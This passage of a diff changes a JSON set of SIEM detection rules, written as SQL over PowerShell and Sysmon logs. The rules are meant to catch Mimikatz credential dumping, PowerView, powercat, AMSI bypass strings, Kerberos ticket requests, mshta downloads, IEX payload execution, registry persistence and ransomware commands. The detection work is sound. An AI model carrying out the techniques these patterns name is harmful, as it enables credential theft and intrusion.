'%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", - "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", + "status": "experimental", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", - "id": "603c6630-5225-49c1-8047-26c964553e0e", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Potential In-Memory Execution Using Reflection.Assembly", - "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "title": "Suspicious Extrac32 Execution", + "id": "aa8e035d-7be4-48d3-a944-102aec04400d", "status": "experimental", - "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", + "description": "Download or Copy file with Extrac32", "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' OR Image LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR OriginalFileName = 'extrac32.exe') AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND (CommandLine LIKE '%/C%' ESCAPE '\\' OR CommandLine LIKE '%/Y%' ESCAPE '\\' OR CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "posh_ps_dotnet_assembly_from_file.yml" + "filename": "proc_creation_win_lolbin_extrac32.yml" }, { - "title": "Suspicious Invoke-Item From Mount-DiskImage", - "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "title": "Direct Autorun Keys Modification", + "id": "24357373-078f-44ed-9ac4-6d334a668a11", "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "author": "frack113", + "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" ], - "filename": "posh_ps_run_from_mount_diskimage.yml" + "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", + "title": "Remote Access Tool - RURAT Execution From Unusual Location", + "id": "e01fa958-6893-41d4-ae03-182477c5e77d", "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + }, + { + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "status": "test", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_regedit_trustedinstaller.yml" + }, + { + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "falsepositives": [ + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", - "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockLogging LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockLogging LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Windows PowerShell Upload Web Request", - "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", + "title": "Lolbin Runexehelper Use As Proxy", + "id": "cd71385d-fd9b-4691-9b98-2b1f7e508714", "status": "experimental", - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1020" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\runexehelper.exe' ESCAPE '\\')" ], - "filename": "posh_ps_upload.yml" + "filename": "proc_creation_win_lolbin_runexehelper.yml" }, { - "title": "Change User Agents with WebRequest", - "id": "d4488827-73af-4f8d-9244-7b7662ef046e", - "status": "experimental", - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", - "author": "frack113", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Suspicious X509Enrollment - Ps Script", - "id": "504d63cb-0dba-4d02-8531-e72981aace2c", + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", "status": "experimental", - "description": "Detect use of X509Enrollment", - "author": "frack113", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate administrative script" + "Legitimate scripts that use IEX" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_x509enrollment.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Powershell LocalAccount Manipulation", - "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1204" + ], + "falsepositives": [ + "Scripts that shutdown the system immediately and reboot them in safe mode are unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_malware_snatch_ransomware.yml" + }, + { + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", "status": "test", - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "author": "frack113", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_localuser.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "PowerShell WMI Win32_Product Install MSI", - "id": "91109523-17f0-4248-a800-f81d9e7c081d", - "status": "experimental", - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", + "title": "Changing Existing Service ImagePath Value Via Reg.EXE", + "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", + "status": "test", + "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.persistence", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-CimMethod %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName %' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Product %' ESCAPE '\\' AND ScriptBlockText LIKE '%-MethodName %' ESCAPE '\\' AND ScriptBlockText LIKE '%.msi%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" ], - "filename": "posh_ps_win32_product_install_msi.yml" + "filename": "proc_creation_win_reg_service_imagepath_change.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", - "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", + "status": "test", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", - "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unknown" + 